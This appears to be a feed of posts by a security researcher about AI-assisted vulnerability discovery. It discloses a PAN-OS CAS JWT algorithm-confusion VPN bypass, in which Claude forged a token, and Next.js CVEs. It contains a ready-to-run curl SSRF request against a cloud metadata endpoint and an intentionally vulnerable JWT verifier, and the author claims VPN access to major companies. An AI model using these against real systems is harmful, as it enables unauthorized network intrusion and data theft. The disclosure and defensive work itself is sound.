Introducing Hacktron Whitebox: get white-box security assessments with audit-ready reports without waiting on a traditional pentest cycle.
AI has roughly tripled the rate of code shipped in the past year. But penetration testing has not kept pace, often taking weeks to months.
Models tend to set up very brute-forceable passwords in most cases, related to the company name, year, task, context, etc. Golden era for credential brute-force attacks in the coming months.
Last year, on a vacation, @S1r1u5_ and I were discussing the human need for validation and how most things we do can be tied to it, consciously or subconsciously.
Mohan asked, "Would you still be doing what you do (hacking, publishing blogs, competing, etc.) if no one was there to see it?" At that time, my answer was "yeah, probably?"
Today, the world has somewhat come to that. All the things you thought gave you validation are now norms. Things you once took pride in can be replicated in a few prompts. I mean, people are dropping 0days every day now, and there's little chance of your blog getting reads, so there goes that validation. So would you still do it on your own? For your own sake and sanity?
My answer is a confident yes now.
In the last couple of months, I've seen models find bugs autonomously, or sometimes with just a bit of a hunch from me, but sharing these bugs publicly hasn't been rewarding. And not in the sense of likes or reach alone; I've just been less motivated overall. I have a few blogs sitting in my queue, and what I'm noticing is I keep procrastinating, because there's not much authenticity to my own work in them, and I don't have the enthusiasm to share the same story again, how the model found this and that. I think if you really love the game, sooner or later, you have to come to terms with the fact that to stay sane, you need to go back to that problem-solving phase, otherwise it gets pretty depressing. As much as I love watching LLMs find bugs, it feels soulless at times. All this is a signal to me that I can't function like this in the long run. It makes me feel dopamine-deprived, and I need to be hacking shit on my own.
Now, when I say "on my own", I don't mean no AI, AI bad. No, not at all. There's a big difference between using an LLM as an accelerator in your work vs delegating your understanding to it. From a long-term pov, the former is the only path imo, and even then, the mind map you build on your own is very different from the one you'd end up with leaning on LLMs. The dopamine hit isn't even close to figuring shit out on your own.
Seeing how AI is making 0days the norm and CTFs no longer the same, the question is more real now than ever. Would you still sit down and hack stuff even when no one's watching, knowing people might be on top of the leaderboard via AI, just for the love of the game?
This is a critical auth bypass (affecting GlobalProtect VPN), not sure why this was marked as high. I have already managed to get VPN access to major corps!
Unlike the buffer overflow, this isn't limited to PAN-OS.
Will be disclosing full details later next week on @HacktronAI blog.
https://t.co/iby50nmGdF
After configuring CAS on my instance (and trust me, this was the toughest part of the journey), Claude forged a JWT, POSTed it to /SAML20/SP/ACS, and got a session cookie/tokens that can be used to connect to the VPN.
It was game over. Your private network was public. If you're running CAS-enabled PAN-OS, update the appliance immediately.
When Your VPN Opens Your Private Network to the Public!
An auth bypass in Palo Alto PAN-OS CAS Auth (CVE-2026-0265) that lets an attacker connect to the company's GlobalProtect VPN.
Blog - https://t.co/xMBbKC60NZ
I pointed Claude to start diving into the CAS implementation in the shared libraries, and in just a few minutes, it had found a textbook JWT algorithm confusion. The verification function trusts the alg header from the JWT itself. Switch RS256 to HS256, and the public signing certificate becomes the HMAC secret key. I couldn't believe it at first. This, in 2026?
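The defect described in the two posts above (a verifier that takes the algorithm from the token's own header, so an RS256 deployment's public PEM doubles as an HMAC secret) beside its hardened form, as an added example that is not PAN-OS code or anything from the author. No real RSA is performed: PUBLIC_KEY_PEM is a constructed placeholder standing in for the IdP's signing certificate, and the RS256 branch is a stub.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed placeholder standing in for the IdP's RS256 public certificate.
PUBLIC_KEY_PEM = "-----BEGIN PUBLIC KEY-----\nCONSTRUCTED-PLACEHOLDER\n-----END PUBLIC KEY-----\n"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_hs256_token(claims: dict, key: bytes) -> str:
    """Build an HS256 JWT (what a legitimate HMAC-based issuer would do)."""
    h = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    p = _b64url(json.dumps(claims).encode())
    sig = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{_b64url(sig)}"


def _check(alg: str, signing_input: bytes, sig: bytes, key_material: str) -> bool:
    """Signature check for one algorithm. RS256 is a stub here (no RSA in this example)."""
    if alg == "HS256":
        expected = hmac.new(key_material.encode(), signing_input, hashlib.sha256).digest()
        return hmac.compare_digest(expected, sig)
    return False  # placeholder: real code does RSA PKCS#1 v1.5 verification for RS256


def verify_vulnerable(token: str, key_material: str) -> Optional[dict]:
    """Defective: the algorithm is read from the token, so a token that says HS256
    is HMAC-checked against whatever key material the server holds, PEM included."""
    h, p, s = token.split(".")
    alg = json.loads(_b64url_decode(h)).get("alg")
    ok = _check(alg, f"{h}.{p}".encode(), _b64url_decode(s), key_material)
    return json.loads(_b64url_decode(p)) if ok else None


def verify_pinned(token: str, key_material: str, expected_alg: str) -> Optional[dict]:
    """Hardened: the algorithm comes from server configuration; a header that
    disagrees is rejected before any signature math runs."""
    h, p, s = token.split(".")
    if json.loads(_b64url_decode(h)).get("alg") != expected_alg:
        return None
    ok = _check(expected_alg, f"{h}.{p}".encode(), _b64url_decode(s), key_material)
    return json.loads(_b64url_decode(p)) if ok else None
```

Beyond pinning the algorithm, an ACS endpoint should also check issuer, audience, expiry and a one-time assertion id, which this snippet leaves out.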
We are investigating unauthorized access to GitHub’s internal repositories. While we currently have no evidence of impact to customer information stored outside of GitHub’s internal repositories (such as our customers’ enterprises, organizations, and repositories), we are closely monitoring our infrastructure for follow-on activity.
Last week's Next.js stable release patches multiple vulnerabilities found by @HacktronAI
CVE-2026-44578: SSRF via WebSocket upgrade.
It is the most impactful of all: it lets an attacker read internal hosts such as cloud metadata endpoints on self-hosted Next.js applications.
curl -H "Connection: Upgrade" -H "Upgrade: websocket" \
-H "Sec-WebSocket-Version: 13" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
"http://target:3000" \
--request-target "http://169.254.169.254/latest/meta-data/"
CVE-2026-44574: Middleware auth bypass via internal query params.
Next.js uses internal query params nxtP<param> and nxtI<param> to pass resolved dynamic route params from routing to route modules. They're never stripped from external requests, leading to middleware bypass in dynamic routes.